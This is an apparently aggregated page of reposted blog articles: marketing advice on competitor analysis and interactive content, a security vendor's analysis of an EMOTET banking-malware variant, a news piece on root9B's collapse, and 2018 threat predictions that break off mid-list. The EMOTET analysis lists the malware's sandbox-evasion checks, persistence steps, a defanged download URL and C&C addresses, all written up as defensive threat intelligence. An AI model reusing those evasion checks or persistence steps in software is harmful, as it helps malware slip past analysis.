No Comment Diary

The News Without Comment

This content shows Simple View

Hacks

How to Increase Profits by Analyzing Your Competition

How well do you know your competition?

Depending on your industry or location, the market may be saturated with businesses providing the same services or offering the same products as your company does.

Not everyone will survive.

Sooner or later, one or two companies will separate themselves from the crowd.

If you want to be an expert in your niche, you’ll need to learn effective competitor analysis skills.

Otherwise, you could put yourself at risk of falling behind those businesses that adopt these strategies first.

As a marketing expert who founded several startup companies, I’m well aware of how competitive certain spaces can be.

It’s not easy to operate a business, especially when you’re worried about the guy down the street taking customers away from you.

Whether you’re a small-town business or a global ecommerce store, you need to analyze your competition.

If you’ve never done this before, I’ll show you how to get started.

My techniques will help you improve your business and increase profits fast.

Identify your competitors

Knowing your competitors may sound obvious to you, but you’d be surprised how many people I meet can’t name their competitors.

Those of you who fall into this category have to identify your top competitors before you do anything else.

Even if you know who your competition is, it won’t hurt to start here. You may be find new information.

Let’s say you’re a local business selling sandwiches in Seattle.

Run a search on Yelp:

image8 10

Simple.

The top results will be advertisements, but that doesn’t mean those aren’t your competitors.

Don’t disregard them completely just yet.

Here’s something else to keep in mind.

You’re looking only for your direct competition.

If your sandwich shop also sells cookies or pies, you’re not looking for bakeries or specialty dessert shops.

You’re also not competing with every bar in your neighborhood that has a sandwich on the menu.

Make sense?

So filter your search to get more accurate results:

image3 10

If you click on the “all filters” tab, you can narrow the results.

For this example, I’d recommend picking a price range similar to yours and a place in the same neighborhood.

If your most expensive menu item is $12, you don’t care about the gourmet restaurant 8 miles away selling $45 sirloin steak sandwiches on their dinner menu.

Now that you’ve got a more accurate list, write down your top competitors.

In a busy city, like Seattle, you may find upward of 30 sandwich shops in your neighborhood alone.

That’s way too many.

Look for businesses with the most reviews and the highest ratings.

Narrow that list down to 5 or 10 at most.

Yelp isn’t your only resource.

Depending on your business, you can also reference Google Local or Angie’s List.

However, these platforms may not be helpful if you’re trying to identify competitors in a digital marketplace.

If your operations are run completely through a blog, website, or ecommerce store, you’ll need to use other tools to identify your competitors.

Try using a service like SimilarWeb:

image10 10

They offer lots of competitor analysis tools, including competitor identification.

All you need to do is put in the name of your website, and they’ll generate a list of your competitors.

They have a free sign-up option, but to maximize your research, I would recommend paying for an upgraded subscription.

If you don’t want to pay for a subscription, consider reaching out to your current customers.

Creating an effective customer survey can help you learn more about their habits.

Send a survey to your subscriber list asking them to identify other websites they shop at or blogs they read.

Who is their target audience?

Now that you’ve identified your top competitors, it’s time for you to see whom they are targeting.

You can’t assume their target market is the same as yours.

Don’t believe me?

Let’s continue with the local sandwiches example.

Here’s a chain sandwich shop called Cheba Hut:

image11 10

Take a look at the names of the sandwiches on their menu.

Also, notice how they refer to their different sizes.

Based on your research, you may have identified this company as a top competitor.

They have the same hours as you; they’re close to you; and they sell sandwiches at the same price point.

But it’s clear this business is trying to appeal to a certain crowd.

It works.

Don’t get me wrong.

I’m not saying you need to adopt this strategy and look for a niche market to focus your marketing strategy on.

All I’m saying is you need to identify the target market of your top competitors.

After further analysis, you may determine you want to make some adjustments, but we’re not quite there yet.

Here are some things to consider when you’re identifying your competition’s target audience:

  • Age
  • Location
  • Income
  • Gender
  • Marital status

Your results won’t be perfect, but try to come up with an accurate customer profile based on their advertising campaigns.

Your Google ranking is essential

How can you be better than your competitors?

You both have the same type of content on your website.

You’re targeting the same customers.

They even update their site, services, and products as frequently as you do.

Why are they ranked so much higher on a Google search than you are?

You need to understand the components of Google’s ranking algorithm:

image7 10

Visit your competitors’ websites.

Evaluate their SEO.

Determine how they are using keywords to boost their search ranking.

Look for keywords and phrases in the following places on their sites:

  • Title pages
  • H1 headings
  • H2 headings
  • Internal links
  • URL structure
  • Content

Do you notice a pattern?

See what words are getting used the most in these places.

It may have an impact on their rankings.

Compare their content to the keywords on your site.

Are you using long-tail keywords?

image9 10

You should be.

Incorporating a long-tail strategy into your content creation will improve your ranking because it’s more specific.

Ecommerce sites use this tactic all the time to get more hits.

If you’re selling a pillow, adding the word “pillow” all throughout your content isn’t as effective as using terms like “down pillow for side sleepers.”

Is your competition using this strategy?

If so, that’s probably why they’re outranking you in related search results.

Analyze competitor content

Take your analysis one step further.

Getting customers to your platform is only half the battle.

But what do these people see once they arrive?

Here are some other things to look for on your competitor’s page:

  • Blogs
  • Pictures
  • Videos
  • Case studies
  • Buying guides
  • FAQ pages
  • Podcasts
  • Guest posts
  • CTA

Compare these to your own website.

They may have certain features you’ve omitted from your site.

I’m not saying you should automatically mimic the structure of their pages, but see what’s working for them.

For example, let’s say you discover your top three competitors have a blog. And all three outrank you on Google.

You should consider adding a blog to your site.

image2 10

This data about the benefits of blogging speaks for itself.

Adding a blog to your website will help you:

  1. Generate more leads
  2. Increase conversions
  3. Get more inbound links
  4. Have more indexed pages
  5. Gain trust from consumers

And that will lead to increased profits.

Something else to keep an eye on while you’re analyzing their website is their calls to action.

How is your competition adding subscribers, generating leads, or converting sales?

Look at their sales pitches.

See what benefits they are offering.

How do their top features compare to yours?

You may realize your product and service are significantly better than those of your competition.

But that doesn’t mean anything if you can’t relay that information to your customers.

Look at how marketers are failing to use CTAs:

image6 10

Reviewing the CTA on your competition’s website could be an eye-opening experience for your marketing department.

Your competitors may excel in areas where you’re lacking.

That’s okay for now. But it needs to be fixed before you fall too far behind.

Look at their social media presence

All businesses should have a presence on social media platforms.

For now, I’m going to assume your company is active on at least some of the most popular platforms:

  • Facebook
  • Twitter
  • YouTube
  • Instagram

If not, you need to follow my social media guide.

For those of you who already have profiles set up, navigate to your competitors’ pages.

How active are they?

What are they posting?

Are their customers engaged with their posts, photos, videos, and comments?

Here’s an idea.

Start adding their followers.

These people are obviously interested in your industry if they are following your competitors.

Maybe they don’t know your company exists.

Don’t be selective. Add all of them.

The more people you add, the greater your chances of getting customers to follow you back will be.

Understand why consumers follow brands on social media:

image4 10

Once they start following you, it’s essential you keep them engaged.

Keep in mind, some of these people may have already established a brand loyalty with your competition.

You really need to blow them away to convince them your brand is better.

See what kind of promotions your competitors are running on social media.

Try to run one that’s more appealing.

How do they incorporate videos into their social media marketing strategy?

Video content makes up more than 90% of Internet traffic.

You should be using live video to engage with your customers.

Even if that’s something your competition isn’t doing, it’s a great way to stay ahead of them.

Recognize areas needing improvement

Now that you’ve analyzed your competitors’ customers, websites, marketing strategies, and social platforms, it’s time to adjust your business.

Based on your research, what areas of your business need improvement?

Where do your competitors excel while you struggle?

There’s always room for improvement. Don’t be biased.

It’s okay to recognize your competitors are doing well.

Run a SWOT analysis:

image1 10

Here are some questions to ask yourself.

Strengths

  • What are you doing well?
  • How have you separated yourself from the competition?
  • What makes your company unique?

Weaknesses

  • What do you need to improve to compete with your top competitors?
  • What resources or tools do you need to achieve that?
  • Do you need to change your location or conversion method?

Opportunities

  • What is the current public perception of your company?
  • How can you target new customers based on your competition’s strategy?
  • Are there any new changes in the industry or market?

Threats

  • Which competitors are directly impacting your revenue?
  • What’s preventing you from improving your business?
  • How are you leaving yourself vulnerable to losing customers?

These questions are just a starting point.

You can take this SWOT analysis much further to make the necessary changes and improvements.

Conclusion

If you want to increase profits, start by analyzing your competition.

Competitor analysis is an effective strategy for businesses in all industries, whether your company is large, small, or somewhere in the middle.

The first thing you need to do is identify your top competitors.

Narrow this list down to 5 or 10 at the most.

Only look for direct competitors—not just any business similar yours.

Once you’ve identified these companies, you need to focus on their customers.

What’s their target market?

How are they appealing to these customers?

Focus on your Google ranking:

image5 10

Analyze your competition’s website to see what kind of SEO tactics they’re using.

Review their content, and compare it to your own.

What pages on their site generate the most user engagement?

Consider adding a blog to your website if you don’t have one already.

Check out the social media profiles of your top competitors.

Start adding their followers in an attempt to draw more customers to your business.

Use the SWOT analysis to recognize and implement any necessary changes.

Making these changes can help improve your business and increase profits.

Which online tools will you use to identify the top 5 direct competitors in your industry?

Source: http://ift.tt/UU7LJr



5 Interactive Content Myths That Are Holding Your Content Strategy Back

5 Interactive Content Myths That Are Holding Your Content Strategy Back
No matter what challenges we face in life, there are always a million reasons why it might be easier to give up than persevere.

Humans are creatures of comfort – and getting out of our comfort zone has a tendency to scare us. This holds true in both our personal and professional lives, which is precisely why it’s often easier to stick with what we’ve always done rather than try out a new plan of attack.

Too often, we let our fears or the myths we’ve heard from others discourage us from diving into the latest trend or process. One of the biggest campaign trends in recent years has centered on creating interactive content. All of the world’s most successful brands, from Nike to Netflix, have been utilizing interactive content in order to drive engagement and increase brand awareness. But many of the smaller brands have been scared.

Just because you’re not a big multinational company doesn’t mean you should let fear or perceived obstacles hold you back. I’ve compiled five of the biggest myths about interactive content and plan to bust them in this post to prove that you can succeed with interactive content, no matter what roadblocks you may think are in your way.

MYTH #1: ‘It’s too expensive’

While it is indeed easy to sink your whole marketing budget into an overly elaborate interactive campaign, it’s definitely not essential! You can incorporate interactive content into your marketing plan today with very little investment.

Thanks to advances in software and platforms, you won’t need to sacrifice quality either. There are many options available for all kinds of businesses and budgets. International marketing trainer and speaker Michael Leander refers to affordable interactive options as ‘little apps’.

“Little apps are solutions that do a very specific thing – you can call it a niche thing – that anyone can implement if they want to,” Leander explains.

So-called ‘little apps’ such as Zembula, Wheelio and Gleam all offer affordable ways to incorporate interactive content into your marketing strategy without breaking the bank. Some of them even come with a free trial, so you can try before you buy and make sure you get the most out of what each one has to offer.

Here is what an experience from Zembula looks like:

MYTH #2: ‘It doesn’t really affect engagement levels’

For marketers, engagement is always the end goal. We know that an increase in engagement equals a boost in brand awareness and customer loyalty.

It’s been proven that interactive content fosters more engagement than static content. In fact, interactive content drives 2x the number of conversions as passive content.

So, why is interactive content more effective at driving conversions? Well, key psychological principles associated with interactive content, such as curiosity and conditioning, ensure that your recipients are neurologically motivated to respond to your call-to-action.

If your brand can figure out how to use interactive content to create a fun experience for your customers, you will not only increase engagement levels, you will also increase brand loyalty.  62% of Millennials, 55% of Generation X and 44% of Baby Boomers say that ‘fun’ is an important factor that impacts their brand loyalty. Brand loyalty, in turn, drives increased revenue from each customer. It’s a win-win!

MYTH #3: ‘Interactive content is just a lot of polls and quizzes’

In certain circles, interactive content has developed a bad reputation as the lazy marketer’s way out. It’s true that today’s customers are getting sick of polls and quizzes. However, there are a lot of different kinds of interactive content that many marketers are just now hearing about.

Stay ahead of the curve and offer unique interactive experiences to keep your customers interested in your content.

While there are many types of interactive content, make sure you pick the format that works best with your campaign goals. You could try your hand at interactive video, calculators or interactive white papers – just remember that whatever you chose, there is likely a software solution to help you.

MYTH #4: ‘It requires a lot of development time’

As busy digital marketers, our time is spread thinner than rice paper. From daily tasks like responding to emails to long-term activities such as boosting engagement, our minds are always torn between 10 different directions at once.

Many marketers shy away from experimenting with interactive content because they’re afraid of the development time associated with such tech-heavy campaigns. Not to fear! One of my favorite tips for saving time is to repurpose an existing campaign by adding an interactive element. It requires little to no creative development hours, and the easy-to-use interface of many interactive programs means it won’t spend forever passing through your development team either!

One way to experiment with this idea is to take a long-form piece of evergreen content that is already developed and pull a couple of pieces of trivia out of it. You can use your preferred strategy, like quizzes or ‘snackable’ reveal experiences, and wrap your trivia in interactivity. For instance, if you have an ebook or white paper, why not make a quiz from the contents? Or, try incorporating swiping, tapping, or scratching on an interactive experience to really make the questions stand out!

These techniques not only create fun, gamified experiences, they take very little time to think up and create.

MYTH #5: ‘It isn’t right for my industry’

Why leave all the fun to the online clothing retailers and the millennial TV networks? Interactive content is suitable for brands of all shapes and sizes! From manufacturing giants to B2B software companies, interactive content can provide a boost in your ROI regardless of your industry.

In fact, check out this example by GoToMeeting, and take a gander at this example by subscription service Bistro MD that got them 20x the conversion rate over their static content.

The bottom line is that you are marketing to people, even if you are a B2B company. The psychology behind the success of interactive content includes curiosity, the endowment effect, and FOMO, to name but a few. These are consistent across the board for all industries. All you need is a little creativity and motivation to create something truly awesome for your brand.

Wrapping up

Now that you know five of the most common myths about interactive content, I hope you’re feeling motivated to try something new and go in with guns blazing. After all, they’re just myths!

Go ahead and make the jump in your marketing campaigns. Interactive content can help you stand out from your competition, create a loyal and engaged customer base, and ultimately increase your bottom line.

Guest Author: Nicole Cordier is a marketing writer for Zembula. A journalism graduate from the University of Oregon, she is a Portland native who loves coloring, dogs and all things outdoors.

The post 5 Interactive Content Myths That Are Holding Your Content Strategy Back appeared first on Jeffbullas’s Blog.

Source: http://ift.tt/im5GqL



New EMOTET Hijacks a Windows API, Evades Sandbox and Analysis

We discussed the re-emergence of banking malware EMOTET in September and how it has adopted a wider scope since it wasn’t picky about the industries it attacks. We recently discovered that EMOTET has a new iteration (detected as TSPY_EMOTET.SMD10) with a few changes in its usual behavior and new routines that allow it to elude sandbox and malware analysis.

Based on our findings, EMOTET’s dropper changed from using RunPE to exploiting CreateTimerQueueTimer. CreateTimerQueueTimer is a Windows application programming interface (API) that creates a queue for timers. These timers are lightweight objects that enable the selection of a callback function at a specified time. The original function of the API is to be part of the process chain by creating a timer routine, but here, the callback function of the API becomes EMOTET’s actual payload. EMOTET seems to have traded RunPE for a Windows API because the exploitation of the former has become popular while the latter is lesser known, theoretically making it more difficult to detect by security scanners.

Figure 1. A CreateTimerQueueTimer API document

Figure 1. A CreateTimerQueueTimer API document (from CreateTimerQueueTimer function)

Figure 2. When the EMOTET dropper executes at Stage 4

Figure 2. When the EMOTET dropper executes at Stage 4, the Stage 5 payload at 0x 0x428310 will be injected to CreateTimerQueueTimer.

This is not the first malware we’ve seen abusing CreateTimerQueueTimer. Hancitor, a banking Trojan that dropped PONY and VAWTRAK, also exploited the API in its dropper, which is a malicious macro document.

Anti-Analysis and Anti-Sandbox Techniques

We also observed a new behavior in this variant, which is its anti-analysis technique. Some malware are designed to sleep for a period of time to avoid detection from malware analysis products. The analysis platform will change its sleep period to a very short time to scan for malicious activities. EMOTET’s anti-analysis technique involves checking when the scanner monitors activities to dodge detection. CreateTimerQueueTimer helps EMOTET do the job every 0x3E8 milliseconds.

This variant has the ability to check if it’s inside a sandbox environment at the second stage of its payload. The EMOTET loader will not proceed if it sees that it’s running inside a sandbox environment.

The dropper will check for the following to discern whether it is running in a sandbox environment:

  • When NetBIOS’ name is TEQUILABOOMBOOM.
  • When UserName is Wilber, NetBIOS’ name starts with SC, and NetBIOS name starts with CW.
  • When UserName is admin, DnsHostName is SystemIT, and if there’s a Debugger symbol file like C:\\Symbols\aagmmc.pdb.
  • When Username is admin, and NetBIOS name is KLONE_X64-PC
  • When UserName is John Doe.
  • When UserName is John and there are two files called C:\\take_screenshot.ps1 and C:\\loaddll.exe.
  • When these files are present: C:\\email.doc, C:\\123\\email.doc, and C:\\123\\\email.docx.
  • When these files are present: C:\\a\\foobar.bmp, C:\\a\\foobar.doc, and C:\\a\\foobar.gif.

Figure 3. When sample files are named sample., mlwr_smple. or artifact.exe, the malicious payload will also not be launched.

Figure 3. When sample files are named sample., mlwr_smple. or artifact.exe, the malicious payload will also not be launched.

As part of its unpacking technique, this variant will run itself through another process if it does not have admin privilege. If the process has admin privilege, it will proceed with the following:

  1. Create new service as an auto start to make malware persistent
  2. Change the service description to “Provides support for 3rd party protocol plug-ins for Internet Connection Sharing.”
  3. Start the service.
  4. Collect system information such as process name and system information
  5. Encrypt the collected information via the AES-128 algorithm and SHA1 hash algorithm.
  6. Encrypt the information and POST at the C&C server.

Figure 4. EMOTET collects system process information (left) and saves the result to memory (right)

Figure 4. EMOTET collects system process information (left) and saves the result to memory (right)

Figure 5. EMOTET collects information about the system version and current applications running under C:\WOW64

Figure 5. EMOTET collects information about the system version and current applications running under C:\\WOW64\

Figure 6. EMOTET C2 IP(RED):PORT(YELLOW) List

Figure 6. EMOTET C2 IP(RED):PORT(YELLOW) List

Infection Chain

Figure 7. The variant’s infection chain

Figure 7. The variant’s infection chain

The infection chain of this variant starts with a phishing email. The email contains a malicious URL that will drop a document file containing a malicious macro.

Figure 8. EMOTET phishing email

Figure 8. EMOTET phishing email

Figure 9. Malicious EMOTET document

Figure 9. Malicious EMOTET document

Figure 10. The malicious macro inside the document will prompt cmd.exe and PowerShell to execute an encoded and obfuscated string.

Figure 10. The malicious macro inside the document will prompt cmd.exe and PowerShell to execute an encoded and obfuscated string.

The command downloads EMOTET from hxxp://bonn-medien[.]de/RfThRpWC/ and will execute the dropper PE payload from the malicious site.

Figure 11. The network traffic of Powershell downloading the dropper

Figure 11. The network traffic of Powershell downloading the dropper from bonn-medien[.]de/RfThRpWC/

Enterprises and end-users can avoid threats like EMOTET by following best practices for defending against phishing attacks. Users should always be cautious of individuals or organizations that ask for personal information. Most companies will not ask for sensitive data from its customers. When in doubt, users should verify with the company to avoid any potential issues. Users should also avoid clicking links or downloading files even if they come from seemingly “trustworthy” sources. In addition, enterprises can stay protected by employing strong security policies to their email gateway and ensuring that their network infrastructure can filter, validate, and block malicious traffic like anomalous data exfiltration.

Trend Micro Solutions

Combating threats against the likes of EMOTET call for a multilayered and proactive approach to security—from the gateway, endpoints, networks, and servers. Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. Trend Micro Deep Discovery™ has an email inspection layer that can protect enterprises by detecting malicious attachment and URLs.

Trend Micro™ Hosted Email Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network. It protects Microsoft Exchange, Microsoft Office 365, Google Apps, and other hosted and on-premises email solutions.

Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

SHA256:

  • Malicious document (W2KM_POWLOAD.AUSJTM)
    455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53
  • Dropper sample (TSPY_EMOTET.SMD10)
    fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
  • Malicious macro (W2KM_EMOTET.DG)
    3f75ee07639bbcebf9b904debae1b40ae1e2f2cbfcef44caeda21a9dae71c982

Malicious C&Cs

  • 164[.]208[.]152[.]175:8080
  • 66[.]234[.]234[.]36:8080
  • 62[.]210[.]86[.]114:8080
  • 162[.]243[.]154[.]25:443
  • 37[.]187[.]57[.].57:443
  • 94[.]199[.]242[.]92:8080
  • 178[.]254[.]33[.]12:8080
  • 136[.]243[.]202[.]133:8080

C&C public key

—–BEGIN RSA PUBLIC KEY—–
MGcCYDeWo1m4l56rx8uAsn+gsDBAYoJARIdddsLOaiOf4oxe0GGy3IruKSmi
RSMfzj93sIHm88vzhJOeUkLES+RuDXUwSfob8u8bx5TjoSmY2kdmx5rgkp8U
NqD3z+P0m6bAxwIDAQAB
—–END RSA PUBLIC KEY—–

 

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

New EMOTET Hijacks a Windows API, Evades Sandbox and Analysis

http://ift.tt/2iZ0JB1 Source: http://ift.tt/1amucZ5



R.I.P. root9B, We Hardly Knew Ya!


root9B, a company that many in the security industry consider little more than a big-name startup aimed at cashing in on the stock market’s insatiable appetite for cybersecurity firms, surprised no one this week when it announced it was ceasing operations at the end of the year.

Founded in 2011, Colorado Springs, Colo. based root9B Technologies touted itself as an IT security training firm staffed by an impressive list of ex-military leaders with many years of cybersecurity experience at the Department of Defense and National Security Agency (NSA). As it began to attract more attention from investors, root9B’s focus shifted to helping organizations hunt for cyber intruders within their networks.

By 2015, root9B was announcing lucrative cybersecurity contracts with government agencies and the infusion of millions from investors. The company’s stock was ballooning in price, reaching an all-time high in mid-May 2015.

That was just days after root9B issued a headline-grabbing report about how its cyber intelligence had single-handedly derailed a planned Russian cyber attack on several U.S. financial institutions.

The report, released May 12, 2015, claimed root9B had uncovered plans by an infamous Russian hacking group to target several banks. The company said the thwarted operation was orchestrated by Fancy Bear/Sofacy, a so-called “advanced persistent threat” (APT) hacking group known for launching sophisticated phishing attacks aimed at infiltrating some of the world’s biggest corporations.  root9B released its Q1 2015 earnings two days later, reporting record revenues.

On May 20, 2015, KrebsOnSecurity published a rather visceral dissection of that root9B report: Security Firm Redefines APT; African Phishing Threat. The story highlighted the thinness of the report’s claims, pointing to multiple contradictory findings by other security firms which suggested the company had merely detected several new phishing domains being erected by a comparatively low-skilled African phishing gang that was well-known to investigators and U.S. banks.

In mid-June 2015, an anonymous researcher who’d apparently done a rather detailed investigation into root9B’s finances said the company was “a worthless reverse-merger created by insiders with [a] long history of penny-stock wipeouts, fraud allegations, and disaster.”

That report, published by the crowd-sourced financial market research site SeekingAlpha.com, sought to debunk claims by root9B that it possessed “proprietary” cybersecurity hardware and software, noting that the company mainly acts as a reseller of a training module produced by a third party.

root9B’s stock price never recovered from those reports, and began a slow but steady decline after mid-2015. In Dec. 2016, root9B Technologies announced a reverse split of its issued and outstanding common stock, saying it would be moving to the NASDAQ market with the trading symbol RTNB and a new name — root9B Holdings. On January 18, 2017, a reshuffled root9B rang the market opening bell at NASDAQ, and got a bounce when it said it’d been awarded a five-year training contract to support the U.S. Defense Department.

The company’s founders remained upbeat even into mid-2017. On June 6, 2017 it announced that Michael Hayden, the four-star general who until recently served as director of the U.S. National Security Agency, had joined the company’s board.

On June 23, 2017, root9B issued a press release reminding everyone that the company had remained #1 on the Cybersecurity 500 for the 6th consecutive quarter. The Cybersecurity 500, by the way, rates cybersecurity firms based on their “branding and marketing.”

Nobody ever accused root9B of bad marketing. But all the press releases in the world couldn’t hide the fact that the company had never turned a profit. It lost more than $18.3 million in 2016, more than doubling a $8.03 million loss in 2015.

Since August 2017, shares of the company’s stock have fallen more than 90 percent. On Sept. 28, 2017, all of root9B’s assets were acquired by venture investment firm Tracker Capital Management LLC, and then sold at auction.

On Nov. 13, root9B Holdings issued a press release saying NASDAQ was de-listing the firm on Nov. 15 and that it was ceasing operations at the end of this year. The statement seemed to emphasize there was nothing left for the firm’s creditors to pick over.

“With the absence of any operating assets remaining after the Foreclosure, the Company will cease any and all operations effective, December 31, 2017,” the (final?) root9B press release concludes.

The demise of root9B resonates loudly with that of Norse Corp., another flashy, imploded cybersecurity startup that banked heavily on attracting and touting top talent, while managing to produce very little that was useful to or actionable by anybody.

Companies like these are a reminder that your success or failure in business as in life is directly tied to what you produce — not what you promise or represent. There is no shortcut to knowledge, success or mastery, and this goes for infosec students as well as active practitioners of the craft. Focus on consistently producing quality, unique content and/or services that are of real value to others, and the rest will take care of itself.









Tags: , , , , , , , ,


http://ift.tt/2z45og1 Source: http://ift.tt/TKsn16



Threat Predictions for Cryptocurrencies in 2018

Threat Predictions for Cryptocurrencies in 2018

The landscape in 2017

Today, cryptocurrency is no longer only for computer geeks and IT pros. It’s starting to affect people’s daily life more than they realize. At the same time, it is fast becoming an attractive target for cybercriminals. Some cyberthreats have been inherited from e-payments, such as changing the address of the destination wallet address during transactions and stealing an electronic wallet, among other things. However, cryptocurrencies have opened up new and unprecedented ways to monetize malicious activity.

In 2017, the main global threat to users was ransomware: and in order to recover files and data encrypted by attackers, victims were required to pay a ransom in cryptocurrency. In the first eight months of 2017, Kaspersky Lab products protected 1.65 million users from malicious cryptocurrency miners, and by the end of the year we expect this number to exceed two million. In addition, in 2017, we saw the return of Bitcoin stealers after a few years in the shadows.

What can we expect in 2018?

With the ongoing rise in the number, adoption and market value of cryptocurrencies, they will not only remain an appealing target for cybercriminals, but will lead to the use of more advanced techniques and tools in order to create more. Cybercriminals will quickly turn their attention to the most profitable money-making schemes. Therefore, 2018 is likely to be the year of malicious web-miners.

  1. Ransomware attacks will force users to buy cryptocurrency. Cybercriminals will continue to demand ransoms in cryptocurrency, because of the unregulated and almost anonymous cryptocurrency market: there is no need to share any data with anyone, no one will block the address, no one will catch you, and there is little chance of being tracked. At the same time, further simplification of the monetization process will lead to the wider dissemination of encryptors.
  2. Targeted attacks with miners. We expect the development of targeted attacks on companies for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners will result in lower but longer Next year we will see what tips the scales.
  3. Rise of miners will continue and involve new actors. Next year mining will continue to spread across the globe, attracting more people. The involvement of new miners will depend on their ability to get access to a free and stable source of electricity. Thus, we will see the rise of ‘insider miners’: more employees of government organizations will start mining on publicly owned computers, and more employees of manufacturing companies will start using company-owned facilities.
  4. Web-mining. Web-mining is a cryptocurrency mining technique used directly in browser with a special script installed on a web-page. Attackers have already proved it is easy to upload such a script to a compromised website and engage visitors’ computers in mining and, as a result add more coins to the criminals’ wallets. Next year web-mining will dramatically affect the nature of the Internet, leading to new ways of website monetization. One of these will replace advertising: websites will offer to permanently remove a mining script if the user subscribes to paid content. Alternatively, different kinds of entertainment, such as movies, will be offered for free in exchange for your mining. Another method is based on a website security check system – Captcha verification to distinguish humans from bots will be replaced with web mining modes, and it will be no longer matter whether a visitor is bot or human since they will ‘pay’ with mining.
  5. Fall of ICO (Initial Coin Offering). ICO means crowdfunding via cryptocurrencies. 2017 saw tremendous growth of this approach; with more than $3 billion collected by different projects, most related in some way to blockchain. Next year we should expect ICO-hysteria to decline, with a series of failures (inability to create the ICO-funded product), and more careful selection of investment projects. A number of unsuccessful ICO projects may negatively affect the exchange rate of cryptocurrencies (Bitcoin, Ethereum etc.), which in 2017 experienced unprecedented growth. Thus we will see a decrease in the absolute number of phishing and hacking attacks targeting ICO, smart contracts and wallets.

http://ift.tt/2ALz7HG Source: https://securelist.com



Threat Predictions for Financial Services and Fraud in 2018

The landscape in 2017

In 2017 we’ve seen fraud attacks in financial services become increasingly account-centric. Customer data is a key enabler for large-scale fraud attacks and the frequency of data breaches among other successful attack types has provided cybercriminals with valuable sources of personal information to use in account takeover or false identity attacks. These account-centric attacks can result in many other losses, including that of further customer data and trust, so mitigation is as important as ever for businesses and financial services customers alike.

What can we expect in 2018?

2018 will be a year of innovation in financial services as the pace of change in this space continues to accelerate. As more channels and new financial service offerings emerge, threats will diversify. Financial services will need to focus on omni-channel fraud prevention to successfully identify more fraud crossing from online accounts to newer channels. Newer successful payment types will see more attack attempts as their profitability for attack increases.

  1. Real-time payment challenges. Increasing demand from consumers for real-time and cross-border financial transactions results in pressure to analyse risk more quickly. Consumer expectations for friction-free payments make this task even more challenging. Financial services will need to rethink and make ‘Know Your Customer’ processes more effective. Machine learning and eventually AI-based solutions will also be key in meeting the need for quicker fraud and risk detection.
  2. Social engineering attacks. Financial services will need to stay focused on tried and tested attack techniques. In spite of more sophisticated emergent threats, social engineering and phishing continue to be some of the simplest and most profitable attacks – exploiting the human element as the weakest link. Customer and employee education should continue to improve awareness of the latest attacks and scams.
  3. Mobile threats. According to the latest Kaspersky Cybersecurity Index, ever more online activity now takes place on mobile. For example, 35 per cent of people now use their smartphone for online banking and 29 per cent for online payment systems (up from 22 per cent and 19 per cent respectively in the previous year). These mobile-first consumers will increasingly be prime targets for fraud. Cybercriminals will use previously-successful and new malware families to steal user banking credentials in creative ways. In 2017 we saw the modification of malware family Svpeng. In 2018, other families of mobile malware will re-surface to target banking credentials with new features. Identification and the removal of mobile malware is essential to financial services institutions to stop these attacks early.
  4. Data breaches. Data breaches will continue to make the headlines in 2018 and the secondary impact on financial institutions will be felt through fake account set ups and account take-over attacks. Data breaches, although harder to commit than individual fraud attacks against customers, are hugely profitable to criminals thanks to the high volume of customer data exposed in one hit. Financial services should regularly test their defences and use solutions to detect any suspicious access at the earliest stages.
  5. Cryptocurrency targets. More financial institutions will explore the application of cryptocurrencies, making attacks on these currencies a key target for cybercriminals. We already saw the occurrence of mining malware increasing in 2017 and more attempts to exploit these currencies will be seen in 2018. Solutions capable of detecting the latest malware families should be used as well as combining the latest threat intelligence into prevention strategies. [See Threat Predictions for Cryptocurrencies for further information on this threat.]
  6. Account takeover. More secure physical payments through chip technology and other Point of Sale improvements, have shifted fraud online in the past decade. Now, as online payment security improves through tokenisation, biometric technology and more, fraudsters are shifting to account takeover attacks. Industry estimates suggest fraud of this type will run into billions of dollars as fraudsters pursue this highly profitable attack vector. Financial services will need to rethink digital identities and use innovative solutions to be sure that customers are who they say they are, every time.
  7. Pressure to innovate. More and more businesses will venture into payment solutions and open banking offerings in 2018. Innovation will be key to incumbent financial service firms seeking a competitive advantage over an increasing number of competitors. But understanding the regulatory complications can be challenging enough, never mind evaluating the potential for attack on new channels. These new offerings will be targets for fraudsters upon release and any new solution not designed with security at the core will find itself an easy target for cybercriminals.
  8. Fraud-as-a-Service. International underground communication amongst cybercriminals means that knowledge is shared quickly and attacks can spread globally even faster. Fraud services are offered on the dark web, from bots and phishing translation services to remote access tools. Less experienced cybercriminals purchase and use these tools, meaning more attempted attacks for financial services to block. Sharing knowledge across departments as well as looking to threat intelligence services will be key in mitigation.

ATM attacks.  ATMs will continue to attract the attention of many cybercriminals. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote and fileless operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars with a step-by-step user guide. Kaspersky Lab has published a report on future ATM attack scenarios targeting ATM authentication systems.

http://ift.tt/2AKfm3f Source: https://securelist.com



Threat Predictions for Connected Health in 2018

The landscape in 2017

In 2017, Kaspersky Lab research revealed the extent to which medical information and patient data stored within the connected healthcare infrastructure is left unprotected and accessible online for any motivated cybercriminal to discover. For example, we found open access to around 1,500 devices used to process patient images. In addition, we found that a significant amount of connected medical software and web applications contains vulnerabilities for which published exploits exist.

This risk is heightened because cyber-villains increasingly understand the value of health information, its ready availability, and the willingness of medical facilities to pay to get it back.

What can we expect in 2018?

The threats to healthcare will increase as ever more connected devices and vulnerable web applications are deployed by healthcare facilities. Connected healthcare is driven by a number of factors, including a need for resource and cost efficiency; a growing requirement for remote, home-based care for chronic conditions like diabetes and ageing populations; consumer desire for a healthy lifestyle; and a recognition that data-sharing and patient monitoring between organizations can significantly enhance the quality and effectiveness of medical care.

The threats facing these trends over the coming 12 months include the following:

